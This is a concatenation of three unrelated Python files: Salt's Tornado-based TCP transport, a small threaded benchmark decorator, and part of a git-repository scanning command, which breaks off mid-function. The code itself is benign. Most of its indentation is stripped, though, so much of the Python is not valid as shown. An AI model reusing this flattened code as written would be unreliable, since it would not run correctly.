if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
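# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the opts keys the
# helper above inspects, using a plain dict in place of the Salt opts mapping.
# The numeric values are hypothetical.
def _example_set_tcp_keepalive():
    opts = {
        "tcp_keepalive": True,       # master switch for SO_KEEPALIVE
        "tcp_keepalive_idle": 300,   # seconds of idle before the first probe
        "tcp_keepalive_cnt": 5,      # unanswered probes before the link is dropped
        "tcp_keepalive_intvl": 30,   # seconds between probes
    }
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    _set_tcp_keepalive(sock, opts)
    return sock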
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
class Resolver:
_resolver_configured = False
@classmethod
def _config_resolver(cls, num_threads=10):
salt.ext.tornado.netutil.Resolver.configure(
"salt.ext.tornado.netutil.ThreadedResolver", num_threads=num_threads
)
cls._resolver_configured = True
def __init__(self, *args, **kwargs):
if not self._resolver_configured:
# TODO: add opt to specify number of resolver threads
self._config_resolver()
class TCPPubClient(salt.transport.base.PublishClient):
"""
Tornado based TCP Pub Client
"""
ttype = "tcp"
def __init__(self, opts, io_loop, **kwargs): # pylint: disable=W0231
self.opts = opts
self.io_loop = io_loop
self.message_client = None
self.connected = False
self._closing = False
self.resolver = Resolver()
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
@salt.ext.tornado.gen.coroutine
def connect(self, publish_port, connect_callback=None, disconnect_callback=None):
self.publish_port = publish_port
self.message_client = MessageClient(
self.opts,
self.opts["master_ip"],
int(self.publish_port),
io_loop=self.io_loop,
connect_callback=connect_callback,
disconnect_callback=disconnect_callback,
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_publish_port"),
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
if not isinstance(messages, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(messages)
body = salt.transport.frame.decode_embedded_strs(body)
else:
body = messages
raise salt.ext.tornado.gen.Return(body)
@salt.ext.tornado.gen.coroutine
def send(self, msg):
yield self.message_client._stream.write(msg)
def on_recv(self, callback):
"""
Register an on_recv callback
"""
return self.message_client.on_recv(callback)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class TCPReqServer(salt.transport.base.DaemonizedRequestServer):
"""
Tornado based TCP Request/Reply Server
:param dict opts: Salt master config options.
"""
# TODO: opts!
backlog = 5
def __init__(self, opts): # pylint: disable=W0231
self.opts = opts
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
                # We only close the socket if we don't have a req_server instance.
                # If we did, closing it here would break req_server.stop(): tornado
                # would raise an AssertionError while trying to match socket.fileno()
                # (-1 after close) against the fd it holds in its _sockets cache in
                # order to remove the socket from the IOLoop handlers.
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
        Pre-fork we need to create the listening socket (or, on Windows, the load balancer process)
"""
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer,
args=(self.opts, self.socket_queue),
name="LoadBalancerServer",
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, message_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
message_handler: function to call with your payloads
"""
self.message_handler = message_handler
with salt.utils.asynchronous.current_ioloop(io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload, header=None):
payload = self.decode_payload(payload)
reply = yield self.message_handler(payload)
stream.write(salt.transport.frame.frame_msg(reply, header=header))
def decode_payload(self, payload):
return payload
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, framed_msg["body"], header
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e, exc_info=True)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
        for item in list(self.clients):
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class MessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self._read_until_future = None
self._on_recv = None
self._closing = False
self._closed = False
self._connecting_future = salt.ext.tornado.concurrent.Future()
self._stream_return_running = False
self._stream = None
self.backoff = opts.get("tcp_reconnect_backoff", 1)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
self.io_loop.add_timeout(1, self.check_close)
@salt.ext.tornado.gen.coroutine
def check_close(self):
if not self.send_future_map:
self._tcp_client.close()
self._stream = None
self._closing = False
self._closed = True
else:
self.io_loop.add_timeout(1, self.check_close)
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
@salt.ext.tornado.gen.coroutine
def getstream(self, **kwargs):
if self.source_ip or self.source_port:
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
stream = None
while stream is None and not self._closed:
try:
stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to"
" %s:%s: %r, will reconnect in %d seconds",
self.host,
self.port,
exc,
self.backoff,
)
yield salt.ext.tornado.gen.sleep(self.backoff)
raise salt.ext.tornado.gen.Return(stream)
@salt.ext.tornado.gen.coroutine
def connect(self):
if self._stream is None:
self.stream = True
self._stream = yield self.getstream()
if not self._stream_return_running:
self.io_loop.spawn_callback(self._stream_return)
if self.connect_callback:
self.connect_callback(True)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
self._stream_return_running = True
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
wire_bytes = yield self._stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
# self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not"
" tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing or self._closed:
return
if self.disconnect_callback:
self.disconnect_callback()
stream = self._stream
self._stream = None
if stream:
stream.close()
yield self.connect()
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing or self._closed:
return
if self.disconnect_callback:
self.disconnect_callback()
stream = self._stream
self._stream = None
if stream:
stream.close()
yield self.connect()
self._stream_return_running = False
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id, msg):
if message_id not in self.send_future_map:
return
future = self.send_future_map.pop(message_id)
if future is not None:
future.set_exception(SaltReqTimeoutError("Message timed out"))
@salt.ext.tornado.gen.coroutine
def send(self, msg, timeout=None, callback=None, raw=False):
if self._closing:
raise ClosingError()
message_id = self._message_id()
header = {"mid": message_id}
future = salt.ext.tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
self.io_loop.call_later(timeout, self.timeout_message, message_id, msg)
item = salt.transport.frame.frame_msg(msg, header=header)
yield self.connect()
yield self._stream.write(item)
recv = yield future
raise salt.ext.tornado.gen.Return(recv)
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(
self, opts, io_loop=None, presence_callback=None, remove_presence_callback=None
):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.presence_events = False
if presence_callback:
self.presence_callback = presence_callback
else:
self.presence_callback = lambda subscriber, msg: msg
if remove_presence_callback:
self.remove_presence_callback = remove_presence_callback
else:
self.remove_presence_callback = lambda subscriber: subscriber
def close(self):
if self._closing:
return
self._closing = True
for client in self.clients:
            client.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if self.presence_callback:
self.presence_callback(client, body)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self.remove_presence_callback(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.debug("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, topic_list=None):
log.trace("TCP PubServer sending payload: %s \n\n %r", package, topic_list)
payload = salt.transport.frame.frame_msg(package)
to_remove = []
if topic_list:
for topic in topic_list:
sent = False
for client in self.clients:
if topic == client.id_:
try:
# Write the packed str
yield client.stream.write(payload)
sent = True
# self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
if not sent:
log.debug("Publish target %s not connected %r", topic, self.clients)
else:
for client in self.clients:
try:
# Write the packed str
yield client.stream.write(payload)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
            self.remove_presence_callback(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPublishServer(salt.transport.base.DaemonizedPublishServer):
"""
Tornado based TCP PublishServer
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.pub_sock = None
@property
def topic_support(self):
return not self.opts.get("order_masters", False)
def __setstate__(self, state):
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts}
def publish_daemon(
self,
publish_payload,
presence_callback=None,
remove_presence_callback=None,
**kwargs
):
"""
Bind to the interface specified in the configuration file
"""
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
io_loop = salt.ext.tornado.ioloop.IOLoop()
io_loop.make_current()
# Spin up the publisher
self.pub_server = pub_server = PubServer(
self.opts,
io_loop=io_loop,
presence_callback=presence_callback,
remove_presence_callback=remove_presence_callback,
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
self.pub_server = pub_server
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=io_loop,
payload_handler=publish_payload,
)
# Securely create socket
        log.warning("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
io_loop.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(
self.publish_daemon, kwargs=kwargs, name=self.__class__.__name__
)
@salt.ext.tornado.gen.coroutine
def publish_payload(self, payload, *args):
ret = yield self.pub_server.publish_payload(payload, *args)
raise salt.ext.tornado.gen.Return(ret)
def publish(self, payload, **kwargs):
"""
Publish "load" to minions
"""
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
if not self.pub_sock:
self.pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,),
loop_kwarg="io_loop",
)
self.pub_sock.connect()
self.pub_sock.send(payload)
def close(self):
if self.pub_sock:
self.pub_sock.close()
self.pub_sock = None
class TCPReqClient(salt.transport.base.RequestClient):
"""
Tornado based TCP RequestClient
"""
ttype = "tcp"
def __init__(self, opts, io_loop, **kwargs): # pylint: disable=W0231
self.opts = opts
self.io_loop = io_loop
parse = urllib.parse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
master_addr = (master_host, int(master_port))
# self.resolver = Resolver()
resolver = kwargs.get("resolver")
self.message_client = salt.transport.tcp.MessageClient(
opts,
master_host,
int(master_port),
io_loop=io_loop,
resolver=resolver,
source_ip=opts.get("source_ip"),
source_port=opts.get("source_ret_port"),
)
@salt.ext.tornado.gen.coroutine
def connect(self):
yield self.message_client.connect()
@salt.ext.tornado.gen.coroutine
def send(self, load, timeout=60):
ret = yield self.message_client.send(load, timeout=timeout)
raise salt.ext.tornado.gen.Return(ret)
def close(self):
self.message_client.close()
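# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the shape of a single
# framed message as described by the module docstring.  In the classes above
# the framing is produced by salt.transport.frame.frame_msg() and consumed by
# a salt.utils.msgpack.Unpacker(); the header key 'mid' is the request id that
# MessageClient.send() uses to match replies to futures.
def _example_framed_message(body):
    header = {"mid": 1}
    # One msgpack map with 'head' and 'body' keys, exactly what
    # SaltMessageServer.handle_stream() and MessageClient._stream_return()
    # unpack on the other end of the stream.
    return salt.utils.msgpack.dumps({"head": header, "body": body})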
|
benchmark.py
|
import shelve
import sys
import threading
import time
class Benchmark(object):
def __init__(self, concurrency=10, iterations=10):
self.concurrency = concurrency
self.iterations = iterations
self.shelf = Shelf()
def __call__(self, f):
def wrapped(*args, **kwargs):
            print('Benchmarking %s...' % f.__name__, end=' ')
sys.stdout.flush()
# build threads
threads = [threading.Thread(target=f, args=args, kwargs=kwargs)
for _ in range(self.concurrency)]
start = time.time()
for thread in threads:
thread.start()
while any(thread.is_alive() for thread in threads):
pass
end = time.time()
total_time = end - start
mean_time = total_time / (self.concurrency * self.iterations)
task_per_sec = (self.concurrency * self.iterations) / total_time
previous = self.shelf.get(f.__name__)
self.shelf.set(f.__name__, total_time)
if previous is not None:
percent_diff = 100.0 * (total_time - previous) / previous
print ('%2.3f seconds total (%+2.3f%%), %2.3f seconds per task, %2.3f tasks per second'
% (total_time, percent_diff, mean_time, task_per_sec))
else:
print ('%2.3f seconds total, %2.3f seconds per task, %2.3f tasks per second'
% (total_time, mean_time, task_per_sec))
return wrapped
class Shelf(object):
def __init__(self):
self.filename = '.keystoneworkout-benchmark-shelf'
def get(self, key):
shelf = shelve.open(self.filename)
try:
return shelf.get(key)
finally:
shelf.close()
def set(self, key, value):
shelf = shelve.open(self.filename)
try:
shelf[key] = value
finally:
shelf.close()
def delete(self, key):
shelf = shelve.open(self.filename)
try:
del shelf[key]
finally:
shelf.close()
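# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): how the decorator is
# meant to be applied.  The wrapped callable runs once per thread, while the
# per-task figures divide by concurrency * iterations, so the callable is
# presumably expected to perform `iterations` units of work itself; the
# workload below is hypothetical.
@Benchmark(concurrency=4, iterations=10)
def example_workload():
    total = 0
    for _ in range(10):  # one unit of work per declared iteration
        total += sum(range(1000))
    return total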
|
scan.py
|
import click
import os
import fnmatch
import sys
import time
import threading
import git
import tmanager.core.messages.messages as msg
import tmanager.utilities.file_system as utl_fs
import tmanager.utilities.commands as utl_cmds
from tmanager.core.tool.repository.repository import Repository
@click.command(options_metavar="", short_help="Scan filesystem seeking repositories.")
@click.argument("root-dir", required=False, metavar="<root-dir>")
@click.pass_context
def scan(ctx: click.core.Context, root_dir: str) -> None:
"""
\b
Scan filesystem seeking repositories starting from <root-dir>.
If no <root-dir> is specified it will start scanning the system from your home directory.
\f
:param click.core.Context ctx: click context
:param str root_dir: directory to start scanning by searching repositories
:return: None
"""
# Get configuration object and verbose
cfg = utl_cmds.get_configs_from_context(ctx)
vrb = utl_cmds.get_verbose_from_context(ctx)
# Set initial variable value
root_dir = root_dir or utl_fs.get_home_env()
if not os.path.isdir(root_dir):
raise click.BadArgumentUsage(msg.Echoes.error("{} is not a directory".format(root_dir)))
msg.Prints.info("Using {} as root dir".format(root_dir))
msg.Prints.info("Scanning system for git repositories. This may take a while")
# Scan the system for git repositories
repos_list = []
msg.Prints.verbose("Start searching daemon", vrb)
search = threading.Thread(name='repo_search', target=_repo_seeker, args=(root_dir, repos_list))
search.daemon = True
search.start()
try:
while search.is_alive():
_animated_loading()
except KeyboardInterrupt:
msg.Prints.verbose("Searching deamon has been stopped", vrb)
msg.Prints.verbose(" Quitting...", vrb)
raise click.Abort()
# Delete "searching..." line
sys.stdout.write("\r")
msg.Prints.warning("{} repositories found".format(len(repos_list)))
# Found some repos?
if repos_list:
msg.Prints.verbose("Listing repositories", vrb)
# List repositories found
i = 0
for repo in repos_list:
name = repo.split("/")[-1]
msg.Prints.info("{}. {}, {}".format(i+1, name, repo))
i += 1
# Ask the user to add all repositories found
add_it_all = click.confirm(msg.Echoes.input("Do you want to add all of them?"), default=False)
# OK, add all repositories found to tman
if add_it_all:
msg.Prints.info("All repositories found will be added in tman")
msg.Prints.verbose("All repositories found are going to be added", vrb)
msg.Prints.verbose("Generating repositories indexes", vrb)
chosen_indexes = [*range(len(repos_list))]
# KO, ask to user which repository should be added
else:
msg.Prints.verbose("Do not add all repositories", vrb)
chosen_indexes = click.prompt(msg.Echoes.input("Enter the numbers of the repo you want to add, separated "
"by a comma"), default="q")
if chosen_indexes != "q":
msg.Prints.verbose("There are some repositories to add", vrb)
msg.Prints.verbose("Validate all user input indexes", vrb)
# Sanitize input
chosen_indexes = utl_cmds.sanitize_indexes(repos_list, chosen_indexes)
msg.Prints.verbose("Indexes sanitized: {}".format(chosen_indexes), vrb)
# If there are any indexes after index sanitize
if chosen_indexes:
msg.Prints.verbose("Listing all repositories user wants to add", vrb)
# Print the repositories that will be added
if vrb:
msg.Prints.warning("The following repositories will be added in tman:")
for i in chosen_indexes:
path = repos_list[i]
name = path.split("/")[-1]
msg.Prints.info("{}, {}".format(name, path))
else:
# There isn't any valid index, print error message and quit
msg.Prints.error("None of the supplied indexes is valid")
raise click.Abort()
# User choose to not add any repository
else:
msg.Prints.info("No repository will be add")
return
msg.Prints.verbose("Start to add desired repositories", vrb)
# Add selected repositories to tman
for i in chosen_indexes:
repo_dir = repos_list[i]
repo_name = repo_dir.split("/")[-1]
git_repo = git.Repo(repo_dir)
try:
repo_url = git_repo.remote("origin").url
except ValueError:
msg.Prints.warning("Skipping {}, no origin found".format(repo_name))
continue
add_time = time.time()
